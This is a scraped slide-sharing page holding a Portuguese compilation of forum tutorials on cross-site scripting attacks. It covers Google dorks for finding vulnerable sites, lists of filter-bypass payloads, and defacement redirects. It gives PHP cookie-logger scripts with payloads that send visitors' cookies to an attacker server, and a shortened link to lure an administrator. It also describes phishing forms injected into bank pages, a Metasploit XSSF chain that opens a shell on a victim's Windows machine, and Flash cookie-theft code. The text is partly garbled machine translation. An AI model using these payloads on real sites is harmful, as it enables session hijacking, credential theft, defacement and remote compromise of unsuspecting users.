Segurança & Ruby on RailsSegurança & Ruby on Rails
Segurança & Ruby on RailsJulio Monteiro
 
CJR Apresenta: OWASP TOP10
CJR Apresenta: OWASP TOP10CJR Apresenta: OWASP TOP10
CJR Apresenta: OWASP TOP10CJR, UnB
 

Similar to Xss (20)

Construindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Construindo uma aplicação PHP à Prova de Balas - Rafael JaquesConstruindo uma aplicação PHP à Prova de Balas - Rafael Jaques
Construindo uma aplicação PHP à Prova de Balas - Rafael Jaques
 
Aula 10 - Cross Site Scripting (XSS)
Aula 10 - Cross Site Scripting (XSS)Aula 10 - Cross Site Scripting (XSS)
Aula 10 - Cross Site Scripting (XSS)
 
Invasao_e_Correcao_em_Sites.pdf
Invasao_e_Correcao_em_Sites.pdfInvasao_e_Correcao_em_Sites.pdf
Invasao_e_Correcao_em_Sites.pdf
 
JavaScript - #Aula01 - Introdução
JavaScript - #Aula01 - IntroduçãoJavaScript - #Aula01 - Introdução
JavaScript - #Aula01 - Introdução
 
Website security
Website securityWebsite security
Website security
 
Seminário PHP Injection/ SQL Injection
Seminário PHP Injection/ SQL InjectionSeminário PHP Injection/ SQL Injection
Seminário PHP Injection/ SQL Injection
 
Aprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard BarrosAprendendo a criar plugins para o Wordpress - Richard Barros
Aprendendo a criar plugins para o Wordpress - Richard Barros
 
Palestra sql injection oficial
Palestra sql injection oficialPalestra sql injection oficial
Palestra sql injection oficial
 
Como Fazer Apps Node.Js Seguras
Como Fazer Apps Node.Js SegurasComo Fazer Apps Node.Js Seguras
Como Fazer Apps Node.Js Seguras
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEEAppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
 
Segurança em php
Segurança em phpSegurança em php
Segurança em php
 
Vivendo de hacking
Vivendo de hackingVivendo de hacking
Vivendo de hacking
 
Slide curso metasploit
Slide curso metasploitSlide curso metasploit
Slide curso metasploit
 
Badass XSS: Esqueça o alert e vá para mundo real
Badass XSS: Esqueça o alert e vá para mundo realBadass XSS: Esqueça o alert e vá para mundo real
Badass XSS: Esqueça o alert e vá para mundo real
 
Teste de Segurança: Vulnerabilidade de Aplicações Web
Teste de Segurança: Vulnerabilidade de Aplicações WebTeste de Segurança: Vulnerabilidade de Aplicações Web
Teste de Segurança: Vulnerabilidade de Aplicações Web
 
SEO para Front-End - BeagaJS
SEO para Front-End - BeagaJSSEO para Front-End - BeagaJS
SEO para Front-End - BeagaJS
 
Testes de segurança em aplicações web
Testes de segurança em aplicações webTestes de segurança em aplicações web
Testes de segurança em aplicações web
 
Segurança & Ruby on Rails
Segurança & Ruby on RailsSegurança & Ruby on Rails
Segurança & Ruby on Rails
 
Segurança de Aplicações WEB e OpenSource
Segurança de Aplicações WEB e OpenSourceSegurança de Aplicações WEB e OpenSource
Segurança de Aplicações WEB e OpenSource
 
CJR Apresenta: OWASP TOP10
CJR Apresenta: OWASP TOP10CJR Apresenta: OWASP TOP10
CJR Apresenta: OWASP TOP10
 

Xss

  • 1. XSS INJECTION BASICO XSS O que é Cross Site Scripting (XSS)? Cross Site Scripting permite que você insira um código malicioso em uma aplicação web. (quase com um código javascript, mas também é possível inserir outros códigos como PHP ou HTML. É uma vulnerabilidade que está em quase todos os site que você pode encontrar na WWW. Além disso, vou falar sobre 2 maneiras diferentes de usar XSS … 1. O atacante vai incluir um código em um URL. O XSS não vai ficar na página. 2. O atacante será capaz de inserir um código e ele vai ficar no site. Normalmente, o atacante irá escolher um site com alguns campos “input”, como shoutboxes, blogs e guestbooks. Encontrando vulnerabilidades XSS 1. Http://www.google.com Visite 2. Use “dorks Google”, como search.php? Q = 3. Encontrado o “direito” site para injetá-lo.
  • 2. Noções básicas de XSS Um comum usado Cross Site Scripting injeção é o código JavaScript a seguir: Citação: <script>alert(“something”)</script> Se você executá-lo, ele irá aparecer uma caixa de mensagem que vai dizer “alguma coisa”. Soooo, se você encontrar um site vuln você poderia testar se é a vuln XSS. Basta olhar: Citação: http://database.delete.com/search.php?q=<script>alert(“something”)</script> Isso foi um exemplo para um XSS com javascript. Mas como eu disse antes, o JavaScript não é o único tipo de código que você pode usar para executar um XSS. Aqui está um exemplo de uma injeção HTML: Citação: <br><br><b><u>something</u></b> Será algo como:
  • 3. Citação: http://database.delete.com/search.php?q=<br><br><b><u>something</u></b> Você deverá ver um texto em negrito na página, se a página é vulnerável a XSS. Defacment com XSS Para apagar um site com Cross Site Scripting (XSS), você pode usar os seguintes códigos: Citação: <IMG SRC=”http://mywebsite.com/defacmentpic.jpg”> = Irá incluir uma imagem Citação: <EMBED SRC=”http://mywebsite.com/deface.swf” = Incluirá um vídeo em Flash Citação: <embed src=”deface.mid” hidden autostart=”true” loop=”false” /> = Vai incluir um arquivo de música em modo oculto Citação: <script>window.open( “http://www.XXXXXXX.net/” )</script> = Redireccionado para outro site, neste caso “XXXXXXXXXXXX.net” Roubar cookies usando XSS
  • 4. O método mais utilizado de XSS é o roubo de cookies. Primeiro obtenha uma cookielogger.php (irá anexá-lo!) Ok, agora temos a cookielogger.php. Enviá-lo para seu servidor e também criar um log.txt onde seus logs serão armazenados. Certifique-se que ele funciona! Procura um site vuln e insira o seguinte código: (substitui-lo com suas informações) Citação: document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie Agora, se o usuário visite o site da sua cookies serão roubados e enviados para o seu CookieLogger. Analisar o madeireiro para seus cookies e sequestrar a sua sessão. Mas o que é se o site não possui uma função tal loja? Veja … Citação: http://website.com/search.php?q=document.location = “http://myserver.com/cookielogger.php?c=”+document.cookie Você será redirecionado ao site original para o servidor. (você deve cripta “a seqüência de URL, porque a sua vítima poderia observar o código malicioso incluído para o original URL) Mas como “crypt” esse código para se tornar “normal”, de modo que sua vítima não
  • 5. percebe o redirecionamento para o servidor? Fácil … tudo que você precisa é de uma String para ASCII Converter e as características da função () (Http://www.easycalculation.com/ascii-hex.php) Ok, agora escolher o seu código JavaScript e convertê-lo em ASCII. Citação: <script>alert(“Example”)</script> é igual Citação: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 34 69 120 97 109 112 108 101 34 41 60 47 115 99 114 105 112 116 62 Agora, o navegador só poderia ler o código, se há uma vírgula entre os dedos. Como esta: Citação: 60,115,99,114,105, [...] Finished! Você crypted seu código malicioso a um “código” malicioso escondido: D! Ignorando Filtros Mas o que poderíamos fazer, se um webadmin bloqueou alguns personagens? Hm, temos de encontrar outro método … basta escrever o código de uma maneira
  • 6. diferente. Citação: <script>alert(“Example”)</script> seria Citação: ‘)alert(“Example”); ROUBO DE COOKIES Olá amigos do INW, confiram este tutorial enviado por aratorny sobre XSS. Primeiro de tudo, eu traduzi ele no google e mudei algumas coisas, mais acho que deu pra entender, até porquê, eu aprendi a fazer XSS assim.. Espero que gostem!. Aqui está um outro tutorial escrito por XSS mim. Começarão aprendizagem de hackers comigo. Vou tentar fazer isso o mais breve possível, abrangendo apenas o básico para que ele ajuda a noobs a entender ;p Então vou começar como sempre O que é XSS?
  • 7. Aqui está o wikipedia diz: Cross-site scripting (XSS) é um tipo de computador vulnerabilidade de segurança normalmente encontrados em aplicações web que permite que atacantes para injetar client-side script em páginas da Web vistos por outros usuários. Um cross-site scripting vulnerabilidade pode ser usada por crackers para contornar os controles de acesso, como a política de mesma origem. Cross-site scripting realizadas em sites responderam por aproximadamente 80,5% de todas as vulnerabilidades de segurança documentadas pela Symantec a partir de 2007. [1] O seu efeito pode variar de um incômodo pequeno para um risco de segurança significativo, dependendo da sensibilidade dos dados manipulados pelo o site vulnerável ea natureza de qualquer atenuação de segurança implementada pelo proprietário do site. Ataque! Assim, nesta seção iremos aprender como usar XSS para ganhar controle sobre alguns website.So isto é para um noob real, que não sei nada sobre isso Sorrindo Assim como em todos os hackers outro, XSS também começa por encontrar uma vulnerability.But você pode precisar fazer várias coisas para saber se um site é realmente vulnerável. Então, em primeiro lugar, lembre-se this.A site que tem algo como uma caixa de pesquisa, espaço de login ou qualquer coisa semelhante é mais vulnerável XSS. Portanto, para este primeiro ataque, nós estaremos usando uma caixa de pesquisa. Então coloque este pequeno pedaço de código na caixa e pressione Enter Sorridente Citação: 1 <script>alert("XSS")</script>
  • 8. Agora você pode ver seu script de uma forma muito simples, portanto, incluída no script script tags.The é alertar uma mensagem simples, XSS.Now se uma pequena caixa pop uped dizendo XSS, parabéns! Seu site é vulnerável! Agora, se nada aparecer, isso significa que o site tem filtrado filtro it.This pode ser facilmente contornado por us.There muitos tipos de filtros e na maioria das vezes, o seu bloqueio da caixa de alerta. Assim, em seu código, você encerrou a mensagem “XSS” em dupla quotes.So o sistema sabe que você está tentando XSS hackers desde que foi fechado em quotes.So dupla temos para criptografar a nossa mensagem para enganar o sistema inteligente? Então, agora usamos uma função pouco chamado “String.fromCharCode” Então, o que isso faz é criptografar o nosso texto para linguagem ASCII .. Aqui está um exemplo de como parece.: Citação: String.fromCharCode(88,83,83) Agora 88,83,83 são valores ASCII para XS S.Check este link para saber a tabela de conversão. http://www.ascii.cl/ Não é necessário que Toungee Então, agora digite o código recém-formatado na caixa de busca e aperte enter. Citação: 1 <script>alert(String.fromCharCode(88,83,83))</script> A coisa especial é que você não precisa usar aspas, neste caso, uma vez que esta função é usada Agora você deve obter a caixa pop-up na maioria dos casos. Else há muitos pedaços de código outros que você pode inserir yourself.You pode fazer
  • 9. códigos e introduza-o se você sabe alguma codificação de sorriso Aqui são pedaços de código mais alguns que eu encontrei na net que você pode usar para fazer isso: Citação: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
  • 10. 22 23 24 25 26 27 28 "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83)) </script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83))</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> "><ScRIPt>aLeRT("XSS")</ScRIPt> "><ScRIPt<aLeRT(String.fromCharCode(88,83,83)) </ScRIPt> '><ScRIPt>aLeRT("XSS")</ScRIPt> '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> </script><script>alert("XSS")</script> </script><script>alert(String.fromCharCode(88,83,83) )</script> "/><script>alert("XSS")</script> "/><script>alert(String.fromCharCode(88,83,83))</script> '/><script>alert("XSS")</script> '/><script>alert(String.fromCharCode(88,83,83))</script> </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,8 3)) </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
  • 11. </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83 ,83))</SCRIPT> ";alert("XSS");" ";alert(String.fromCharCode(88,83,83));" ';alert("XSS");' ';alert(String.fromCharCode(88,83,83));' ";alert("XSS") ";alert(String.fromCharCode(88,83,83)) ';alert("XSS") ';alert(String.fromCharCode(88,83,83)) Essas consultas só deve ser capaz para você cortar qualquer tipo de websites.Even dos maiores sites pode estar tendo algumas vulnerabilidades XSS que você pode encontrar com estes idiotas. Avançado XSS Agora vamos aprender a usar essas coisas para atacar websites.Keep em mente que isso é completamente ilegal e você pode ser pego e pode ser cobrado por crime para fazer this.So tomar precauções sempre. Roubar Cookies Então, agora vamos usar o método Cookies roubar para fazer o attack.It é um tipo especial de biscoito / logger que registra o usuário que acessa esse page.So existem muitas maneiras de fazer isso, mas aqui é um método fácil. Portanto, neste método, você precisará configurar um website.So ir para algum sites.I hospedagem preferem http://www.000webhost.com e criar uma conta no que website.Go para gerenciador de arquivos e criar um novo arquivo de texto em it.Name ele qualquer coisa como cookielog.txt ou algo parecido t that.Don ‘enter nada para ele it.Leave blank.Create outro arquivo txt e nomeie-o algo cookiellogger.txt.So exemplo different.For iremos adicionar algum código em -lo para que ele possa enviar logs para o file.So cookielog.txt abrir o arquivo de texto 2 e digite este código:
  • 14. 50 51 52 53 54 55 56 57 58 <?php if(strlen($_SERVER['QUERY_STRING']) > 0) { $fp=fopen('./CookieLog.txt', 'a'); fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."n"); fclose($fp); } else { ?> var ownUrl = ' echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; function URLEncode(str) { // The Javascript escape and unescape functions do not correspond // with what browsers actually do...
  • 15. var SAFECHARS = "0123456789" + // Numeric "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic "abcdefghijklmnopqrstuvwxyz" + "-_.!~*'()"; // RFC2396 Mark characters var HEX = "0123456789ABCDEF"; var plaintext = str; var encoded = ""; for (var i = 0; i < plaintext.length; i++ ) { var ch = plaintext.charAt(i); if (ch == " ") { encoded += "+"; // x-www-urlencoded, rather than %20 } else if (SAFECHARS.indexOf(ch) != -1) { encoded += ch; } else { var charCode = ch.charCodeAt(0); if (charCode > 255) { alert( "Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.n" + "(URL encoding only supports 8-bit characters.)n" + "A space (+) will be substituted." ); encoded += "+"; } else { encoded += "%"; encoded += HEX.charAt((charCode >> 4) & 0xF);
  • 16. encoded += HEX.charAt(charCode & 0xF); } } } // for return encoded; }; cookie = URLEncode(document.cookie); html = '<img src="'+ownUrl+'?'+cookie+'">'; document.write(html); < ?php } ?> Então esse é o script.Agora no cookielogger precisamos mandar essa mensagem para o administrador do site website.So alvo mais provavelmente o administrador não vai olhar it.Since temos que convencê-lo, vamos encurtar o url.Go para www.spam.com/ e encurtar a sua URL.And já que queremos adicionar vulnerabilidade, precisamos adicionar algum código também. Então, adicione este código após a URL e reduzi-lo. Citação: 1 <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> Envie o link para o administrador e esperar para que ele clique it.You precisa ter sorte para o administrador clicar nele Uma vez que ele clicou, você terá a cookie.Now você pode usar algumas ferramentas como o addon gerenciador de cookies que você começa para Mozilla e jogar em torno dele. Sua addon muito bom e realmente ajuda a
  • 17. fazer um monte! Deface Então agora podemos desfigurar a website.Isso é, a publicação que você ganhou controle sobre o site fazendo uma página de desfigurar ou something.Now você precisa usar um pequeno script para redirecionar todo mundo que visita o site para a página de desfigurar. Citação: 1 <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script> Substitua a sintaxe com a sua página desfigurar site. Ignorando o filtro XSS Assim, na maioria das vezes, o simples script não vai dar o pop-up message.It costuma ignorar o filter.So você tem que usar algum outro methods.I irá discutir alguns deles abaixo. Hex Bypass ( Ignorar ) Com personagens bloqueados como>, <, e /, é muito difícil de executar uma consulta de XSS. Não se preocupe, há sempre uma solução Sorrindo Você pode mudar seus personagens, em hexadecimal. A Hex de um determinado personagem, é basicamente o personagem, mas em um formato diferente. Estes devem ajudá-lo: > =% 3c <=% 3c
  • 18. / =% 2f Ignorando ASCII Com uma criptografia ASCII, podemos usar o caractere "Qual é bloqueado um pouco Este é um dos o filtro XSS mais comum ignora de todos os tempos Um script que você precisa para criptografar, ficaria assim...: Citação: 1 <script>alert("XSS")</script> E esta deve estar funcionando: Citação: 1 <script> alert ("XSS") </ script> Para criptografar a sua pequena parte de um script, vá a este site: http://www.wocares.com/noquote.php Ignorando Case-Sensitive Este tipo de cirurgia raramente funciona, mas vale sempre a pena um tiro. Alguns filtros são definidos no local para detectar determinadas seqüências, no entanto, as cordas do filtro que são bloqueados são caso sensível. Então, tudo o que precisamos fazer é executar um script, com diferentes tamanhos de caracteres. Este desvio, ficaria assim: Citação:
  • 19. 1 <script> alert ("XSS") </ script> Você também pode misturar isso com criptografia ASCII se você gosta. Este tipo de cirurgia só funciona em filtros realmente estúpido, ou aqueles realmente muito velho. E por último, eu estou dando alguns idiotas XSS que você pode experimentar no Google. Citação: 1 2 3 4 5 6 inurl: search.php? inurl: find.php? inurl: search.html inurl: find.html inurl: Search.aspx inurl: find.aspx Obrigado por ler... Tradução & Edit: Aratorny Conteúdo: Rain112 Postado por: aratorny
  • 20. ACESSO AO PROMPT DO ALVO POR XSS Explorando XSS XSS (ou CSS, sem confundir com a linguagem para webdesign) é uma vulnerabilidade que permite ao atacante ter acesso à modificação de uma determinada área da página. Sua detecção geralmente é feita incluindo, na variável supostamente vulnerável, um código JavaScript (client-side, ou seja, trabalha no lado do cliente) que apenas mostra uma caixa de alerta com o texto “XSS”. Veja: Código: 1 <script> alert("xss"); </script> Esta falha pode ocorrer, por exemplo, em formulários de busca (onde é mais comum) e em diferentes casos, como em um simples redirecionamento (como na maioria dos grandes mecanismos de pesquisa, como o Google). Desta falha, há 2 tipos: Reflected (refletido): Executa-se apenas para o cliente vítima do ataque, que deve incluir engenharia social. Stored (estocado/permanente): Fica gravado em um banco de dados e executa-se a quem abrir a página. Comum em fóruns, páginas de recados e livros de visitas. Por que você exploraria uma falha como essa? Por que você participa de um fórum ou rede social onde todos tem sua conta, cada qual com seus privilégios, e você quer escalá-los. Neste caso, pode ser feito um código que obtém os cookies do navegador e os envia para algum script seu, via GET, que os
  • 21. obtém e os grava. Veja um exemplo: Crie, no T35 (ou no servidor de sua preferência), um script em PHP desta maneira: Código PHP: 1 2 3 4 5 6 7 8 9 10 11 12 13 <?php $cookies = $_SERVER['QUERY_STRING']; // obtém-se tudo o que há depois de "?" na URL $grava = fopen("hackeds.txt", "a+"); // abre-se um arquivo para escrita fwrite($grava, $cookies . "n n n"); // grava-se os cookies neste arquivo e pula 3 linhas para organização fclose($grava); // fecha o arquivo
  • 22. echo "<script> window.close(); </script>"; // fecha a janela exit; // pronto ?> Claro que não se faz apenas com PHP. Se você trabalha em outra linguagem, boa sorte e vá aos estudos. Porém, PHP é uma linguagem mais comumente usada e fácil de se aprender. Agora, como você conseguirá obter esses cookies? Simples: Código: 1 <script> window.open("http://seusite/seuscript.php?"+document.cookie); </script> Mas, e se o alvo não permite que você inclua códigos JavaScript? Tente resolver com isso e com alguns outros métodos (pesquise…). Quer outra razão para explorar essa falha? Falsificar um site e conseguir alguma informação, como um login e uma senha, de um usuário. Por exemplo, se o formuário de busca de um banco possui uma falha, e você quer conseguir informações privilegiadas, mas não quer simplesmente criar um fake no T35, para não mudar o domínio, uma sugestão é (para não falar “você pode”) criar um formulário ali mesmo, com um action para uma página em um servidor de sua preferência. E, claro, encriptar um pouco a URL ou usar encurtador de links (se mudar o domínio não for atrapalhar) será interessante. Outra razão é um deface. Dependendo da localização onde está a falha, você pode escrever (com document.write()) um iFrame ou usar um location.href para redirecionar a página. Mas, se a localização da falha é dentro de um frame, há formas de burlar isso. Veja: Código: 1 <script> if (window!= top) { top.location.href=location.href; } </script> Quer ainda outra razão? Invadir o computador de alguém! Para isso, usaremos o nosso
  • 23. amigo Metasploit e seu parceiro framework chamado XSSF. Baixamos este último e o extraímos no diretório de instalação do Metasploit? Agora vamos abrir a console do Metasploit (sempre digo que consoles te dão mais poder de fogo do que interfaces gráficas, entre tantas razões, o gasto de memória, por exemplo). Vamos então fazer o Metasploit reconhecer o framework, usando o comando “load”. Código: 1 load XSSF Este comando abrirá um servidor em seu computador com um código JavaScript para ser executado no cliente. Neste caso, ele nos retornou, nas últimas linhas: Código: 1 2 Please, inject 'http://SEU.IP.AQ.UI:88888/loop' resource in an XSS Successfully loaded plugin: XSSF Então, usaremos a URL “http://SEU.IP.AQ.UI:88888/loop”. Após injetá-lo da maneira que quiser (ou que puder), veremos quem caiu, ou melhor, se conectou, usando o seguinte comando em nosso console: Código: 1 xssf_active_victims E ele nos retornou os endereços IP’s de quem se conectou, se ainda está conectado, o seu navegador e a versão e o suporte a cookies. E ele nos alerta também que podemos usar o comando xssf_information [VictimID] para ver mais informações sobre uma vítima. Pegamos o ID da vítima dado na tabela do comando anterior e usamos o comando. Ali vemos ainda seu sistema operacional, a arquitetura de sua máquina, a URL em que está agora e as informações vistas anteriormente, além de outras. Ainda podemos executar códigos JavaScript em tempo real. Faremos uma caixa de alerta, por exemplo, usando o módulo Auxiliary XSSF Alert. Além disso, ainda podemos
  • 24. ler seus cookies, acessar sua área de transferência, e muito mais. Vamos, por exemplo, invadir o prompt de comando da vítima. Vamos usar o exploit ms10_046_shortcut_icon_dllloader para isso. Veja o processo da digitação: Código: 1 2 3 4 5 6 use windows/browser/ms10_046_shortcut_icon_dllloader jobs xssf_active_victims xssf_exploit 7 0 sessions -i l shell Com esses simples comandos, dizemos ao Metasploit para fazer uma espécie de ligação com o exploit, vemos os trabalhos ativos, as vítimas do nosso XSS e, alguns comandos a mais, abrimos o shell, e veja o resultado final: Código: 1 2 3 4 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
  • 25. C:Documents and Settings[alvo]>_ Como vimos, acessamos o prompt de comando do alvo. Lembrando que para isso o alvo precisa estar com Internet Explorer (ou, da minha maneira, IEca). Para fazer um teste (o alvo estava ciente, já que era minha máquina virtual), usava Debian Linux (de onde partiram as versões Ubuntu – Debian 3, e Educacional – Debian 2 com GUI KDE). A máquina tem 1 GB de RAM (dos quais 350 são para o Windows XP virtualizado). Até a próxima! TUTORIAL USANDO XSS EM FLASH O seu alvo não possui uma vulnerabilidade clara de XSS Stored, onde você possa incluir JavaScript. Aparentemente, não possui falha nenhuma em web, mas naquele livrinho de visitas ou recados (e fórum) eles te deixaram incluir Flash. Tudo bem. Como eu vou aproveitar isso? Não vou poder ter acesso ao servidor com isso, visto que Flash é um client-side. Ôpa!, client-side? JavaScript também é! Legal! Vou mostrar aqui o que eu aprendi depois de um tempo de conversa com o pink noise, agora super administrador do FH, logo após ter ownado o fórum adversário. Ele me contou um pouco sobre a falha explorada para esta ação. Antes da conversa, o que eu entendia de Flash se resumia em “absolutamente nada”. Eu tinha o Macromedia Flash PRO 8 instalado na máquina e parado. Claro que ainda não entendo quase nada de Flash, mas isso já é o suficiente para aprender a explorar essa falha. Primeiro, certifique-se de ter o Flash e Action Script 2 (ou superior) em sua máquina. Você pode baixá-lo aqui (não dou muita garantia deste link. Baixe por sua própria conta e risco). Agora, vamos fazer nosso primeiro teste com o comando geturl.
  • 26. Código: getURL('javascript:alert("oi")'); Aqui fizemos somente o básico: mostramos uma caixa de mensagem escrito “oi”. Mas já iniciamos no JS em SWF. Mas, segundo o próprio pink noise, usar geturl() pode nos limitar. Não sei o porquê, mas quem sou eu pra duvidar, já que tudo o que sei sobre Flash se resume nestas linhas? Neste caso ele me sugeriu fazer o seguinte: Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ alert('oi'); }", ""); Note que você deverá trocar o alert(‘oi’); pelo código JS que quiser. Veja alguns exemplos: Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ location.href = 'http://seusite/pegadados.php? dado='+document.cookie; }", ""); Código: import flash.external.ExternalInterface; ExternalInterface.call("function(){ document.write('&lt;iframe src=http://seusite/own.html width=100% height=100%&gt;&lt;/iframe&gt;'); }", ""); Isto também é interessante: Note que nos exemplos acima, o nosso arquivo fará o préprogramado. Mas, seria legal usar um arquivo universal com o comando que você quiser na hora, não é? Assim, usando um encurtador de links, fica melhor e mais rápido. Para isso, faça o seguinte: Código: getURL('javascript:eval(document.location.hash.substr(1))'); Assim, você acessaria:
  • 27. Citação: http://seusite/arquivo.swf#alert(“oi”); Lembrando que salvando como arquivo do Flash ele não irá abrir corretamente. Para isso você deve exportá-lo para SWF (File > Export > Export movie, podendo variar). Como explorar isso? Veja pelos exemplos. Dependendo da localização onde estará seu arquivo, não é interessante ownar de primeira metendo um iframe. Seria mais inteligente adquirir os cookies dos usuários e, possivelmente, de um usuário privilegiado. Pode também ser usado como um simples XSS Reflected, para enganar o alvo pelo domínio. Outra: dependendo da versão de seu Action Script, é necessário colocar, antes do código: Código: class Main { static function main(){ E depois: Código: } } Isto é tudo, pessoal! Moral da história: não permita o uso de <embed> no filtro HTML. Se você precisar inserir vídeos, empregue um dos módulos que inserir vídeos de fontes confiáveis e impedir a interação script. AUTOR: 0KaL
  • 28. XSS EM MURAL DE SITES Esse medoto é velho mais funfa , se tiver outro topico igual aqui podem excluir este =) mural é a pagina onde fica os recados dos visitantes do site. www.site.com.br/mural.php ” /muralderecados.php pode ser diversos jeitos, ai vai tar la pra voce postar seu recados ou comentario, ai você vai colocar uma alerta prencha os campos nome email claro que vai ser com dados falsos xD ai na mensagem você coloca <script type="text/javascript">// alert("textoaki") // ]]>> se aparecer uma alerta com os seu texto é porque ta vul ai voce vai fazer para redirecionar para a sua index que esta modificada
  • 29. ai voce vai la pra postar o recado e coloca <script type="text/javascript">// window.location.href="http://myips.110mb.com/dilluvium.html"; // ]]>> ali ta a minha index você coloca a sua e a pagina vai passar a redirecionar para seu site =) para achar sites coloquei no google inurl:”mural.php” inurl:”recados.php” inurl:”muralderecados.php” Nao se esqueça do proxy Espero que tenham entendido , nao sou muito bom com explicações..huauhau Flwss